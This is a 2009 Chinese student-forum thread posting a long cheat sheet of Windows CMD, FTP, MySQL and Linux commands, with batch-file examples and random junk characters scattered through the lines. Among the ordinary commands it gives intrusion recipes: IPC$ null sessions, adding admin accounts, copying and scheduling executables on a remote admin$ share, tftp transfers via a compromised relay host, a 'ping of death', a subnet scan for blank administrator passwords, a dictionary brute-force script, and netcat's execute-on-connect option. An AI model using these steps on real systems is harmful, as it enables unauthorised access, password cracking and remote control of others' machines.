下沙论坛

 找回密码
 注册论坛(EC通行证)

用新浪微博连接

一步搞定

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
查看: 2929|回复: 9
打印 上一主题 下一主题

CMD命令大全

[复制链接]
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    跳转到指定楼层
    1
    发表于 2009-5-4 09:32:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    一:
    ! {' A, u) L; B9 B5 ~net use ipipc$ " " /user:" " 建立IPC空链接
    7 Z/ }& M- ]4 o  h3 Z* w0 rnet use ipipc$ "密码" /user:"用户名" 建立IPC非空链接- h, y7 l7 _% Q$ Z: w; l' c  [* m
    net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:% j7 ]8 l( x+ W# p! q9 f
    net use h: ipc$ 登陆后映射对方C:到本地为H:( j& E8 u! p- O; v
    net use ipipc$ /del 删除IPC链接
    % r7 c4 C* W  @" Onet use h: /del 删除映射对方到本地的为H:的映射. C. }7 A. S0 o
    net user 用户名 密码 /add 建立用户( J3 c, x6 ]" K5 T
    net user guest /active:yes 激活guest用户
    " H7 }% j  s4 d1 Z  onet user 查看有哪些用户
    2 |1 l# f# A/ x! Y/ qnet user 帐户名 查看帐户的属性
    + ^  t% G* h. w# Dnet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
    5 H. Y' H9 b4 q" k' e2 A) ?net start 查看开启了哪些服务% D% r  _; w0 {$ y, q, G
    net start 服务名  开启服务;(如:net start telnet, net start schedule)# e2 L. g0 n# ^) r- e* F
    net stop 服务名 停止某服务
    * ~  {8 W* e5 W9 t* R* Inet time 目标ip 查看对方时间; m  |4 c1 [" f! j' q: p
    net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
    ' L0 ?1 x! ]) ]: `) X) c4 u. s0 wnet view 查看本地局域网内开启了哪些共享8 n, w1 |* q2 |) Y
    net view ip 查看对方局域网内开启了哪些共享
    : [! v2 K* M/ {* @9 _net config 显示系统网络设置8 e) [9 d' s7 j+ l
    net logoff 断开连接的共享; ^: w$ |3 }" e4 u6 w9 h; @; b
    net pause 服务名 暂停某服务
    4 u, o5 D- N& f; c% Z% D8 anet send ip "文本信息" 向对方发信息3 q8 t8 q+ _/ R  g5 ]) p
    net ver 局域网内正在使用的网络连接类型和信息
    % V7 W8 ~7 O% `% y0 V; {+ lnet share 查看本地开启的共享
    : {- _" h7 t" j2 \: `- ]net share ipc$ 开启ipc$共享
    6 J1 e7 j* Z$ @  ?2 ~) y  cnet share ipc$ /del 删除ipc$共享
    9 M# T" f. n: E, Jnet share c$ /del 删除C:共享, a, R# M8 ?# v$ c2 k1 z9 t0 y( X7 D
    net user guest 12345 用guest用户登陆后用将密码改为123459 T$ {1 E+ n5 @; a$ P
    net password 密码 更改系统登陆密码3 f1 p) x8 K- k+ Y1 i
    netstat -a 查看开启了哪些端口,常用netstat -an% q% g5 Y3 G- f% S: m* w3 ^9 q
    netstat -n 查看端口的网络连接情况,常用netstat -an
    , M  |3 D, N( E7 b/ Cnetstat -v 查看正在进行的工作, H+ P9 y4 x& B0 j# Y" k; O  [/ Q
    netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)/ {# O& j; ]+ J% t
    netstat -s 查看正在使用的所有协议使用情况
    0 q2 \' I1 C# j$ B# f4 v! wnbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写' F0 ~; P! c5 z8 o  D
    tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。# n: ]. [6 O7 r
    ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
    " X$ t4 b3 p5 k3 h0 @& Q* O6 Oping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
    & j0 m2 F8 U- D& Z+ qipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息( _8 i3 ]# b! _
    tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)# D; n( Y: w& r( F
    kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
    5 @6 h% V0 [2 m1 A4 e' j# Udel -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
    0 a. c' J& P# Z2 E4 H4 r% n
    分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
    收藏收藏 分享分享 顶 踩 转发到微博
  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    2
     楼主| 发表于 2009-5-4 09:33:01 | 只看该作者
    二:4 b/ c5 z; w- s6 t1 w, s5 h% Y" @
    del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
    4 O' x% y9 u* n7 S0 J1 E: Vmove 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖3 \& D  n* C5 C4 j
    fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令5 g0 [# T) Q) E- R9 L/ r+ ?7 B
    at id号 开启已注册的某个计划任务
    ! q5 h7 k6 H0 T' uat /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止: U# u! `% t6 M- L) {' Y- d% g! s* B4 d
    at id号 /delete 停止某个已注册的计划任务, h% W3 {9 c& I  J: R6 M
    at 查看所有的计划任务
    ' h; K4 f8 d3 D4 @) nat ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机" i4 E* e" E# A4 O: D( c; K
    finger username @host 查看最近有哪些用户登陆
    8 O6 g1 g7 J, i2 I1 ~. t( T  `' Itelnet ip 端口 远和登陆服务器,默认端口为23
    : C; m8 y+ l% qopen ip 连接到IP(属telnet登陆后的命令)- W$ f# K) B8 L( g, v
    telnet 在本机上直接键入telnet 将进入本机的telnet7 ]( K8 R( R0 Z3 r9 I4 {
    copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件+ P* y  |$ j$ G# W$ p! N6 R
    copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下: H6 R2 a) d3 I
    cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
    ! U6 W% m, R& R- M" jcopy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:8 w( ?- c- F) V6 k* n# g, B
    xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件0 H7 l% x$ ~; Z4 b: w
    tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后,将“IP”的server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
    # s2 L7 S7 |/ V; M' n$ e/ F8 stftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机1 R( _' i2 l2 K) i5 m+ D! R0 ?) N
    ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)- j8 `# N5 k4 u& @* N% `7 J
    route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
    7 b, y/ f* B( oarp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
    7 }% J) ?" p3 h3 ]% X% }) x3 Lstart 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令. K4 |# W2 }6 F3 d2 g
    mem 查看cpu使用情况
    , c" P4 o2 ~) I4 S2 N# U* Oattrib 文件名(目录名) 查看某文件(目录)的属性
    $ b; D& o, ]" i5 t( xattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性% y0 E' E) V5 V8 b! `
    dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间: }4 F& z/ m2 Q$ G/ d- r0 G1 t1 f/ \
    date /t 、 time /t 使用此参数即“DATE/T
    1 U" K9 t- r$ f9 W+ [”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
    3 j+ ~3 j0 ?' `4 l* }) F- Kset 指定环境变量名称=要指派给变量的字符 设置环境变量
    : W4 |% B& I& k% X* z$ l$ P0 R* h) Yset 显示当前所有的环境变量4 s, O4 t# s2 @2 q/ b2 ^
    set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
    3 h/ j5 q3 x5 S2 \5 P' U! Spause 暂停批处理程序,并显示出:请按任意键继续....
    0 {6 s1 B. W0 C/ Eif 在批处理程序中执行条件处理(更多说明见if命令及变量)+ H& ^  O# s  {
    goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
    " {$ Q/ e6 C: y$ s+ z& Gcall 路径批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
    0 M: i6 _9 k7 z. x- K( Ifor 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量): U# ]5 S% W5 f: y* _
    echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
    8 J" w& A  n) `2 \  e1 D. U8 Eecho 信息 在屏幕上显示出信息5 e& G* X# A5 }+ E+ B
    echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中* ^- A' ^1 C* [; Y
    findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello0 r6 i$ G! E5 b, U& z7 N
    find 文件名 查找某文件9 x: E" L% c$ t% w1 R! b
    title 标题名字 更改CMD窗口标题名字2 ]9 ~( Y, S5 p7 A8 k8 i
    color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白. d) R) d3 w/ x- M1 X- x! ?! R: a
    prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为:EntSky )7 f) [2 E- G3 z! O3 e; _
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    3
     楼主| 发表于 2009-5-4 09:33:35 | 只看该作者
    三:
    0 X& J( N, v0 k; wver 在DOS窗口下显示版本信息
    % O7 P% s  ^$ }# b5 j: I2 z! kwinver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)) M5 \9 p) x3 }* R
    format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS) b0 o8 G7 b6 ~3 o
    md 目录名 创建目录
    + E# q! L( C& h# w. @replace 源文件 要替换文件的目录 替换文件
    - g; F4 H( K+ ^; _* k0 k% v; lren 原文件名 新文件名 重命名文件名# L  Z, m- }- l+ K
    tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称6 U& o! H1 k& q5 W+ _/ T
    type 文件名 显示文本文件的内容
    ( L2 d! s4 f3 fmore 文件名 逐屏显示输出文件* U/ W! A1 _# e) q  @( M$ X+ |
    doskey 要锁定的命令=字符
    ! g! P1 ^. Y2 Idoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=. r) \* i; L$ ^, {5 ^2 y! N% i
    taskmgr 调出任务管理器
    - v; v& T0 G, w) b, \chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
    ( s) f0 y4 Y8 U: G8 J) Stlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
    8 u. ?0 \, U, D0 R( Kexit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe5 Z$ A+ W% Q$ x1 ~4 U! v
    path 路径可执行文件的文件名 为可执行文件设置一个路径。% ?7 X! b# _; z  g* ?8 L- Q4 o7 z
    cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?* I4 U# M, x* k0 ^
    regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
    & I0 S9 Q  E% {3 a. jregedit /e 注册表文件名 导出注册表; L% Q. X; l' X
    cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D: est.txt /D pub 设定d: est.txt拒绝pub用户访问。
    " V& W! ^; D2 d, a$ V/ hcacls 文件名 查看文件的访问用户权限列表
    - ^' D, L$ L: f# e) tREM 文本内容 在批处理文件中添加注解
    & y7 d- v% ]" y, Z/ F8 o$ v, Tnetsh 查看或更改本地网络配置情况( H, C$ p* _" T! [0 |
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    4
     楼主| 发表于 2009-5-4 09:35:09 | 只看该作者
    四:+ _$ c1 }4 z( Q+ m3 w
    IIS服务命令:
    6 U+ X% b. f- ^6 `! hiisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)6 z! G9 p: I* h& E3 y7 l7 R
    iisreset /start或stop 启动(停止)所有Internet服务/ `/ \$ g$ `1 @5 @/ k( O
    iisreset /restart 停止然后重新启动所有Internet服务; Q; B* K- {" h* Y
    iisreset /status 显示所有Internet服务状态
    + u  P: m( ]& X7 E1 Siisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动
    6 B* `" i; N1 V7 `) ]. o( ~. ^iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机
    : r# h9 I; W5 x4 {iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务
    & C! v2 X1 l2 p  oiisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。& Y' n( ~, g. @7 S& ?
    FTP 命令: (后面有详细说明内容)
      M9 ^* k* ~: h, w! i+ G7 l( A0 iftp的命令行格式为:
    6 [+ b3 l% O+ @) c) Iftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。. F" p! \) k1 T! N
    -d 使用调试方式。* @  P5 S7 o5 @0 s7 J
    -n 限制ftp的自动登录,即不使用.netrc文件。6 [& {' D# W; y4 g
    -g 取消全局文件名。* E7 k: B  [( a
    help [命令] 或 ?[命令] 查看命令说明$ ~$ ^6 h$ |* ~8 Q& D( L  B& x
    bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
    ' [9 y3 n4 n) U$ kpwd 列出当前远端主机目录
    : @8 }9 v. n/ u: o& h4 oput 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
    ' M7 q3 G& L# n6 _" T3 ~8 Nget 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中1 `( c1 W. a0 m: j
    mget [remote-files] 从远端主机接收一批文件至本地主机; B0 \' ]% I) U( N
    mput local-files 将本地主机中一批文件传送至远端主机7 `. T" z/ Y9 H2 U
    dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件/ K' v& B# i" S/ X6 s% m
    ascii 设定以ASCII方式传送文件(缺省值)
    ) r' N; t4 T, `. kbin 或 image 设定以二进制方式传送文件1 `1 x" m0 a) o, N2 A' Z; v( U
    bell 每完成一次文件传送,报警提示) ^% [, Q3 F, r
    cdup 返回上一级目录
    $ |0 p+ r4 ]! G$ q  Tclose 中断与远程服务器的ftp会话(与open对应)
    8 B, `/ |# X" I1 A8 b! Oopen host[port] 建立指定ftp服务器连接,可指定连接端口
    + b1 |, k5 Y( ]7 fdelete 删除远端主机中的文件
    ! Z9 k9 ?5 e9 @0 Nmdelete [remote-files] 删除一批文件
    + l- z- o, c9 umkdir directory-name 在远端主机中建立目录4 Y# e6 Y/ s& J$ C
    rename [from] [to] 改变远端主机中的文件名* Y, o- Z  ^, F& y7 _, @& S
    rmdir directory-name 删除远端主机中的目录
    8 r, {, T0 N4 O0 N5 R+ a) Estatus 显示当前FTP的状态
    - \' z. [% Y% x4 A$ I$ v2 q" j1 E2 [system 显示远端主机系统类型' U% i( w% y. k, _
    user user-name [password] [account] 重新以别的用户名登录远端主机: u2 |1 a* `3 o. l
    open host [port] 重新建立一个新的连接2 ?$ Q4 n6 j" ?
    prompt 交互提示模式1 L# S/ S) u% D  y/ h
    macdef 定义宏命令
    $ K* \  X. r. G2 s; x3 ?& slcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
    ! `  u7 v! Q: n# l1 Ychmod 改变远端主机的文件权限3 @1 s2 y: v. H) }3 |; D$ w) @
    case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
    - t  W( o7 K4 Qcd remote-dir 进入远程主机目录
    5 `4 X+ }0 M% y" vcdup 进入远程主机目录的父目录  O6 s' {, q! @, X5 B' U9 l
    ! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    5
     楼主| 发表于 2009-5-4 09:35:42 | 只看该作者
    五:
    1 ?$ M+ ]" u7 g: f4 B5 t& A/ _MYSQL 命令:
    . T( N+ W; \) f8 m0 \9 Fmysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。! N, ?) O5 x3 k2 K
    (例:mysql -h110.110.110.110 -Uroot -P123456
    6 ^; u+ E8 l1 y; \+ o注:u与root可以不用加空格,其它也一样)
    ; I* ?2 D; k7 K  b1 L7 w& Wexit 退出MYSQL0 R) R( }$ e. d3 ]; t
    mysqladmin -u用户名 -p旧密码 password 新密码 修改密码$ r3 d) u  z& P2 D$ U
    grant select on 数据库.* to 用户名@登录主机 identified by "密码"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)
    * m  \: O  E" z: X2 O2 y7 c  ?' I  |show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。: F" r: [2 l5 [; P8 |
    use mysql;3 s( X- D. h  z
    show tables; 显示库中的数据表
    ! ^6 ?5 |1 v, M: ?. P/ _: }describe 表名; 显示数据表的结构/ s( x, f3 b0 L1 A+ u  j% B
    create database 库名; 建库
    . ]# g3 s1 c( d% p0 N) H% O; Ruse 库名;" Y' l, ]6 h" \& U- q4 K, X: p
    create table 表名 (字段设定列表); 建表+ @# H- i5 z5 k1 J# w. l9 f4 N* Q
    drop database 库名;
    2 z4 E% V! O* a7 H- E$ fdrop table 表名; 删库和删表, n( Q) w+ d& }- p
    delete from 表名; 将表中记录清空/ O2 ]' H, _# J- ?- R& E# i2 ~0 U
    select * from 表名; 显示表中的记录
    8 ~' h$ h2 X" _* @5 T' Wmysqldump --opt school>school.bbb 备份数据库:(命令在DOS的mysqlin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。
    ' a+ p7 a% L/ d. n7 {win2003系统下新增命令(实用部份):) x1 b2 K0 g- G: R! L' z
    shutdown /参数 关闭或重启本地或远程主机。
    1 b- F' K( X1 h' B; H) J9 z, P5 S- H参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。  n, p, X' Y- S2 O4 V
    例:shutdown /r /t 0 立即重启本地主机(无延时)8 C( Y# y* o: `3 E$ d0 S7 M
    taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
    0 M% a, N- T% E参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。
    9 u, U1 \1 a* c1 `  wtasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
    " u3 }8 n- E" \9 o+ O参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    6
     楼主| 发表于 2009-5-4 09:36:18 | 只看该作者
    六:  w  d8 M3 u4 ^9 H5 Y8 t3 r
    Linux系统下基本命令: 要区分大小写/ I: N& o& H/ g6 _1 ]
    uname 显示版本信息(同win2K的 ver)  ~) p% X6 R- m* _  ]  E8 X
    dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)
    - ?6 O6 l# a: y9 s! J) r/ ~pwd 查询当前所在的目录位置
      u+ z9 g( z( }* Y, Qcd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。2 V& k/ `; A. `0 S# ^7 J
    cat 文件名 查看文件内容
      K4 |3 ?# a7 @! N3 a% @& z+ N' J- Ocat >abc.txt 往abc.txt文件中写上内容。' y$ V- ?. C% g. v* c4 J
    more 文件名 以一页一页的方式显示一个文本文件。0 R# ^8 d7 j: h6 }" r8 z$ E
    cp 复制文件
    # {  d. z' b, {: @# v- Pmv 移动文件0 n3 v1 K+ v" U& U
    rm 文件名 删除文件,rm -a 目录名删除目录及子目录
    % y- y. H# U) `, w; smkdir 目录名 建立目录
    ( m; s; E, n7 Q7 E/ e& z% lrmdir 删除子目录,目录内没有文档。( h) x/ {; m9 h: i: ~6 U  a7 P
    chmod 设定档案或目录的存取权限
    - g  v1 M( L! O3 l& \9 Igrep 在档案中查找字符串
    2 y. s9 o8 h' H3 Udiff 档案文件比较
    0 c: j! z) c6 {3 {- a+ A4 xfind 档案搜寻( H/ q4 U; `; C5 t1 x: [8 t, e
    date 现在的日期、时间
    - u; c3 m) a- d! T/ u: jwho 查询目前和你使用同一台机器的人以及Login时间地点
    5 q' o: r7 x+ dw 查询目前上机者的详细资料) E/ |  W9 I( `& H$ S
    whoami 查看自己的帐号名称: G) J- U' m- [6 n, s- z: O
    groups 查看某人的Group
    ( j( k  @- {7 S) }- E1 e% vpasswd 更改密码
    4 x4 X8 c+ q' o% P0 l6 z- zhistory 查看自己下过的命令
    ! q. I# P. k5 A8 ^- t5 ?ps 显示进程状态
    ; o( t6 {) `! H) v( U8 B" o" Xkill 停止某进程
    : F$ l# k/ ?$ v# R4 R0 ?gcc 黑客通常用它来编译C语言写的文件7 L9 |# r& _8 l; u
    su 权限转换为指定使用者
    . D; W# J5 n! H4 B3 htelnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。/ J! d, ?  A1 ]& f( \. ]6 e1 w
    ftp ftp连接上某服务器(同win2K)- J* z8 f! _" V" p5 `1 v
    附:批处理命令与变量3 z. a% `) D5 x" e/ j
    1:for命令及变量 基本格式:! m1 A* s( p# |2 S, |
    FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。
    * w& j' ?: ?5 _' ^2 a4 O批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use ipipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3$ j# S9 D* U$ S% `9 {4 G
    (set):指定一个或一组文件,可使用通配符,如:(D:user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 }
    ( b0 G/ z/ V- }  Y) ocommand:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开- J: J' A1 m1 N$ G. i* H7 _
    command_parameters:为特定命令指定参数或命令行开关/ m8 r0 G; w; c' b" i
    IN (set):指在(set)中取值;DO command :指执行command+ v  d6 P% w/ P& ]- U" o9 ]
    参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:pass.txt)时 }。
    & X( ^6 l5 a2 G9 L" a% ^用法举例:0 p  |% n& {  P' F" q$ D( y
    @echo off5 j7 ~! s0 ]( e* @( l
    echo 用法格式:test.bat *.*.* > test.txt
    % E$ h6 O# M* {( e* K2 kfor /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /user:administrator | find "命令成功完成" >>test.txt. M: H) O  ^$ ?0 v) Y& K
    存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。3 _; `0 e/ a" _* N* n/ ]
    /L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。! X! z) J% K+ b& m$ O+ C! O2 ~
    @echo off7 g7 L5 \; e4 ]+ C& o& ~: `) F) ]
    echo 用法格式:ok.bat ip
    : t+ o' z" K: T3 W1 m4 h8 J; {% L0 _FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200
    ) Z* s4 |/ C) E$ f6 u存为:ok.exe 说明:输入一个IP后,用字典文件d:pass.dic来暴解d:user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。
    4 n( P5 I  _. \8 m  F3 C
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    7
     楼主| 发表于 2009-5-4 09:36:48 | 只看该作者
    七:3 l5 x' o' d% `9 j" M
    2:if命令及变量 基本格式:5 y& l6 t: R; r4 h7 i3 I; P. H
    IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。, R8 v; _+ M- w% N0 N! z; S
    例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。
    3 ]* j' n# v' ]( v+ @0 指发现并成功执行(真);1 指没有发现、没执行(假)。; `8 g4 q! ?+ I+ i6 h
    IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。0 y) X  _5 t9 L- V9 c
    例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" "), l( _3 W# r1 K1 Y1 t, z
    IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。
    * ]& q1 z" o2 {& V$ E% d例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。2 _  a1 {! h5 F" D7 Y
    IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来,因为del命令要单独一行时才能执行,用上< >后就等于是单独一行了;例如:“if exist test.txt. <del test.txt.> else echo test.txt.missing ”,注意命令中的“.”' C- F6 a! q5 y$ Y2 H2 a
    (二)系统外部命令(均需下载相关工具):
    8 u. y1 L( B) z% ?& r' A1、瑞士军刀:nc.exe
    + @" v# t: s# I7 r参数说明:" b- v- Q9 W2 H4 ], u; ?. w
    -h 查看帮助信息
    ' T/ h) n9 }, q" F5 T-d 后台模式
    " L0 e6 O9 l- O/ y& ]7 ^-e prog程序重定向,一但连接就执行[危险]
    ( N& w( g! ?% D' L-i secs延时的间隔
    % }$ r4 \3 t9 V8 r% h$ H' i3 P-l 监听模式,用于入站连接
    4 i! a, a" Q+ E( y2 l- d-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
    , A0 o- L; I2 E5 v) @) O% |# e-n IP地址,不能用域名# g# X7 w. ~" l: H0 ~0 N( j
    -o film记录16进制的传输5 W0 a* j" X" B2 H" X( A
    -p[空格]端口 本地端口号
